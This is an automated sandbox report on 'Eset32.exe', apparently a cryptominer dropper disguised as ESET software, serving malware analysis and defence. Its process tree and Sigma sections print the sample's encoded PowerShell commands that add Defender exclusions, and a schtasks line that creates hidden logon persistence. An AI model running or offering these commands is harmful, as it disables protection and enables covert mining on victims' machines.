Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Eset32.exe

Overview

General Information

Sample Name:Eset32.exe
Analysis ID:596584
MD5:b405bf6533c047b1a47ceced3b42c23b
SHA1:bbb321d380c3f9d17e49a9f2167234742e292e4d
SHA256:5b35297b640271fea6e846f28d07852589f60ab88ee597c0e2eea68a5de3bec9
Tags:exe
Infos:

Detection

Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected Xmrig cryptocurrency miner
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Writes to foreign memory regions
Found strings related to Crypto-Mining
.NET source code references suspicious native API functions
Encrypted powershell cmdline option found
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
.NET source code contains method to dynamically call methods (often used by packers)
Machine Learning detection for dropped file
Uses schtasks.exe or at.exe to add and modify task schedules
Potential dropper URLs found in powershell memory
PE file contains section with special chars
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Drops PE files
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Suspicious Execution of Powershell with Base64
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • Eset32.exe (PID: 5096 cmdline: "C:\Users\user\Desktop\Eset32.exe" MD5: B405BF6533C047B1A47CECED3B42C23B)
    • 12.exe (PID: 5164 cmdline: C:\Users\user\AppData\Roaming\12.exe MD5: 7ADD9A3AB1734828F756F2725C452C9A)
      • cmd.exe (PID: 5336 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • powershell.exe (PID: 2600 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6332 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • cmd.exe (PID: 4468 cmdline: cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 5408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • schtasks.exe (PID: 5720 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe" MD5: 838D346D1D28F00783B7A6C6BD03A0DA)
      • cmd.exe (PID: 5464 cmdline: cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
        • conhost.exe (PID: 6584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • System.exe (PID: 4512 cmdline: C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 7ADD9A3AB1734828F756F2725C452C9A)
          • cmd.exe (PID: 5924 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 4844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • powershell.exe (PID: 5832 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
            • powershell.exe (PID: 6536 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" MD5: 95000560239032BC68B4C2FDFCDEF913)
          • sihost64.exe (PID: 6896 cmdline: "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe" MD5: E2DD8887AEE175EF9BEFD87B2F6105B3)
    • 1.exe (PID: 6656 cmdline: C:\Users\user\AppData\Roaming\1.exe MD5: D9F92868EEE8D3C8ECD29A7969419D29)
      • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • AppLaunch.exe (PID: 5716 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 6807F903AC06FF7E1670181378690B22)
  • System.exe (PID: 3408 cmdline: C:\Users\user\AppData\Roaming\Windows\System.exe MD5: 7ADD9A3AB1734828F756F2725C452C9A)
    • cmd.exe (PID: 4812 cmdline: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 6040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6236 cmdline: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmpCoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
  • 0x1c7e8:$sa1: stratum+tcp://
0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      Process Memory Space: System.exe PID: 4512CoinMiner_StringsDetects mining pool protocol string in ExecutableFlorian Roth
      • 0x3cda8:$sa1: stratum+tcp://
      • 0x40b9b:$sa1: stratum+tcp://
      • 0x17c640:$sa1: stratum+tcp://
      • 0x180425:$sa1: stratum+tcp://
      Process Memory Space: System.exe PID: 4512JoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        26.2.System.exe.18691d78.9.raw.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
          26.2.System.exe.18691d78.9.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

            Sigma Signatures

            There are no malicious signatures, click here to show all signatures.

            Source: DNS queryAuthor: Brandon George (blog post), Thomas Patzke (rule): Data: Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, QueryName: ip-api.com
            Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 2600, ProcessName: powershell.exe
            Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\Eset32.exe, ProcessId: 5096, TargetFilename: C:\Users\user\AppData\Roaming\12.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5336, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" , ProcessId: 2600, ProcessName: powershell.exe
            Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132926585861677999.2600.DefaultAppDomain.powershell

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: Eset32.exeVirustotal: Detection: 63%Perma Link
            Source: Eset32.exeMetadefender: Detection: 14%Perma Link
            Source: Eset32.exeReversingLabs: Detection: 59%
            Antivirus / Scanner detection for submitted sample
            Source: Eset32.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeAvira: detection malicious, Label: HEUR/AGEN.1235806
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\1.exeVirustotal: Detection: 37%Perma Link
            Source: C:\Users\user\AppData\Roaming\1.exeReversingLabs: Detection: 45%
            Source: C:\Users\user\AppData\Roaming\12.exeVirustotal: Detection: 60%Perma Link
            Source: C:\Users\user\AppData\Roaming\12.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeVirustotal: Detection: 60%Perma Link
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeVirustotal: Detection: 29%Perma Link
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeReversingLabs: Detection: 73%
            Machine Learning detection for sample
            Source: Eset32.exeJoe Sandbox ML: detected
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\1.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\12.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeJoe Sandbox ML: detected

            Bitcoin Miner

            barindex
            Yara detected Xmrig cryptocurrency miner
            Source: Yara matchFile source: 26.2.System.exe.18691d78.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.2.System.exe.18691d78.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: System.exe PID: 4512, type: MEMORYSTR
            Found strings related to Crypto-Mining
            Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://-:x@exit:0
            Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: stratum+tcp://-:x@exit:0
            Source: Eset32.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: Eset32.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: 1.exe, 00000004.00000003.433262708.0000000002612000.00000040.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.433791167.0000000000114000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,SHELL32_IconCache_DoneExtractingIcons,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF

            Networking

            barindex
            May check the online IP address of the machine
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeDNS query: name: ip-api.com
            Potential dropper URLs found in powershell memory
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery
            Source: powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuerymati
            Source: powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmpString found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
            Source: powershell.exe, 0000000A.00000002.514065308.0000021AAB7E7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624575236.0000024F8D59A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001E.00000003.622068168.0000024F8D59A000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679127744.000002BE88776000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000003.671831043.000002BE88776000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 0000001E.00000002.634745548.0000024FA5AC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mi
            Source: powershell.exe, 00000021.00000002.678756357.000002BE86A75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
            Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708582880.0000000006C17000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
            Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
            Source: AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com4
            Source: Eset32.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
            Source: Eset32.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.entrust.net02
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
